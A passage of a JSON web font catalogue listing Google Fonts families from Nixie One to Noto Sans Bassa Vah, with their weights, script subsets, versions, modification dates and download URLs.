\"regular\": \"http://fonts.gstatic.com/s/nixieone/v16/lW-8wjkKLXjg5y2o2uUoUOFzpS-yLw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nobile\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nobile/v17/m8JTjflSeaOVl1i2XqfXeLVdbw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/nobile/v17/m8JRjflSeaOVl1iGXK3TWrBNb3OD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/nobile/v17/m8JQjflSeaOVl1iOqo7zcJ5BZmqa3A.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/nobile/v17/m8JWjflSeaOVl1iGXJUnc5RFRG-K3Mud.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nobile/v17/m8JQjflSeaOVl1iO4ojzcJ5BZmqa3A.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/nobile/v17/m8JWjflSeaOVl1iGXJVvdZRFRG-K3Mud.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nokora\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/nokora/v30/~CgoKBk5va29yYRhkIAAqBAgBGAE=.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/nokora/v30/~CgsKBk5va29yYRisAiAAKgQIARgB.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/nokora/v30/~CggKBk5va29yYSAAKgQIARgB.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nokora/v30/~CgsKBk5va29yYRi8BSAAKgQIARgB.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/nokora/v30/~CgsKBk5va29yYRiEByAAKgQIARgB.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Norican\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/norican/v14/MwQ2bhXp1eSBqjkPGJJRtGs-lbA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nosifer\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nosifer/v20/ZGjXol5JTp0g5bxZaC1RVDNdGDs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Notable\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notable/v14/gNMEW3N_SIqx-WX9-HMoFIez5MI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nothing You Could Do\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nothingyoucoulddo/v15/oY1B8fbBpaP5OX3DtrRYf_Q2BPB1SnfZb0OJl1ol2Ymo.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noticia Text\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/noticiatext/v15/VuJ2dNDF2Yv9qppOePKYRP1GYTFZt0rNpQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/noticiatext/v15/VuJodNDF2Yv9qppOePKYRP12YztdlU_dpSjt.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/noticiatext/v15/VuJpdNDF2Yv9qppOePKYRP1-3R59v2HRrDH0eA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/noticiatext/v15/VuJrdNDF2Yv9qppOePKYRP12YwPhumvVjjTkeMnz.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Color Emoji\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"emoji\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notocoloremoji/v24/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFab5s79iz64w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Emoji\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"emoji\"\n      ],\n      \"version\": \"v34\",\n      \"lastModified\": \"2022-09-26\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/notoemoji/v34/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob_10jwvS-FGJCMY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoemoji/v34/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob-r0jwvS-FGJCMY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoemoji/v34/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob-Z0jwvS-FGJCMY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoemoji/v34/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob911TwvS-FGJCMY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoemoji/v34/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob9M1TwvS-FGJCMY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Kufi Arabic\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh5v3obPnLSmf5yD.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh7v34bPnLSmf5yD.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh4x34bPnLSmf5yD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh5v34bPnLSmf5yD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh5d34bPnLSmf5yD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh6x2IbPnLSmf5yD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh6I2IbPnLSmf5yD.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh7v2IbPnLSmf5yD.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh7G2IbPnLSmf5yD.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Music\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"music\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notomusic/v17/pe0rMIiSN5pO63htf1sxIteQB9Zra1U.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Naskh Arabic\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notonaskharabic/v25/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwvc5krK0z9_Mnuw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notonaskharabic/v25/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwj85krK0z9_Mnuw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notonaskharabic/v25/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwY8lkrK0z9_Mnuw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notonaskharabic/v25/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwWslkrK0z9_Mnuw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Nastaliq Urdu\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notonastaliqurdu/v14/LhWNMUPbN-oZdNFcBy1-DJYsEoTq5pudQ9L940pGPkB3Qt_-DK2f2-_8mEw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notonastaliqurdu/v14/LhWNMUPbN-oZdNFcBy1-DJYsEoTq5pudQ9L940pGPkB3Qu3-DK2f2-_8mEw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notonastaliqurdu/v14/LhWNMUPbN-oZdNFcBy1-DJYsEoTq5pudQ9L940pGPkB3QgH5DK2f2-_8mEw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notonastaliqurdu/v14/LhWNMUPbN-oZdNFcBy1-DJYsEoTq5pudQ9L940pGPkB3Qjj5DK2f2-_8mEw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Rashi Hebrew\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZB-DkRyq6Nf2pfA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZh-HkRyq6Nf2pfA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZWeHkRyq6Nf2pfA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZB-HkRyq6Nf2pfA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZNeHkRyq6Nf2pfA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZ2ebkRyq6Nf2pfA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZ4ObkRyq6Nf2pfA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZh-bkRyq6Nf2pfA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZrubkRyq6Nf2pfA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"devanagari\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosans/v27/o-0OIpQlx3QUlC5A4PNjhjRFSfiM7HBj.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0MIpQlx3QUlC5A4PNr4AwhQ_yu6WBjJLE.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjKhVlY9aA5Wl6PQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AyNYtyEx2xqPaif.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjThZlY9aA5Wl6PQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AzpYdyEx2xqPaif.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosans/v27/o-0IIpQlx3QUlC5A4PNb4j5Ba_2c7A.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0OIpQlx3QUlC5A4PNr4DRFSfiM7HBj.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjFhdlY9aA5Wl6PQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AyxYNyEx2xqPaif.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjOhBlY9aA5Wl6PQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AydZ9yEx2xqPaif.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjXhFlY9aA5Wl6PQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4Az5ZtyEx2xqPaif.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjQhJlY9aA5Wl6PQ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AzlZdyEx2xqPaif.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjZhNlY9aA5Wl6PQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AzBZNyEx2xqPaif.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Adlam\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"adlam\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansadlam/v21/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufnv0TGnBZLwhuvk.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansadlam/v21/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufkn0TGnBZLwhuvk.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansadlam/v21/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufqXzTGnBZLwhuvk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansadlam/v21/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufpzzTGnBZLwhuvk.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Adlam Unjoined\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"adlam\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansadlamunjoined/v21/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_Ye35PMEe-E3slUg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansadlamunjoined/v21/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_Yd_5PMEe-E3slUg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansadlamunjoined/v21/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_YTP-PMEe-E3slUg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansadlamunjoined/v21/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_YQr-PMEe-E3slUg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Anatolian Hieroglyphs\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"anatolian-hieroglyphs\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansanatolianhieroglyphs/v14/ijw9s4roRME5LLRxjsRb8A0gKPSWq4BbDmHHu6j2pEtUJzZWXybIymc5QYo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Arabic\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-06-01\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfyG2vu3CBFQLaig.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfSGyvu3CBFQLaig.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCflmyvu3CBFQLaig.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfyGyvu3CBFQLaig.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCf-myvu3CBFQLaig.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfFmuvu3CBFQLaig.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfL2uvu3CBFQLaig.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfSGuvu3CBFQLaig.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfYWuvu3CBFQLaig.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Armenian\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"armenian\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v39\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLorxbq0iYy6zF3Eg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLopxb60iYy6zF3Eg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLoqvb60iYy6zF3Eg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLorxb60iYy6zF3Eg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLorDb60iYy6zF3Eg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLoovaK0iYy6zF3Eg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLooWaK0iYy6zF3Eg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLopxaK0iYy6zF3Eg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansarmenian/v39/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLopYaK0iYy6zF3Eg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Avestan\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"avestan\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansavestan/v17/bWti7ejKfBziStx7lIzKOLQZKhIJkyu9SASLji8U.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Balinese\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"balinese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov7fdhE5Vd222PPY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov4XdhE5Vd222PPY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov2nahE5Vd222PPY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov1DahE5Vd222PPY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Bamum\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"bamum\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbamum/v26/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPEddO-_gLykxEkxA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansbamum/v26/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPEeVO-_gLykxEkxA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansbamum/v26/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPEQlJ-_gLykxEkxA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansbamum/v26/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPETBJ-_gLykxEkxA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Bassa Vah\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"bassa-vah\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbassavah/v17/PN_bRee-r3f7LnqsD5sax12gjZn7mBpL5YwUpA2MBdcFn4MaAc6p34gH-GD7.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansbassavah/v17/PN_bRee-r3f7LnqsD5sax12gjZn7mBpL5YwUpA2MBdcFn4MoAc6p34gH-GD7.ttf\",\n        \"600\": 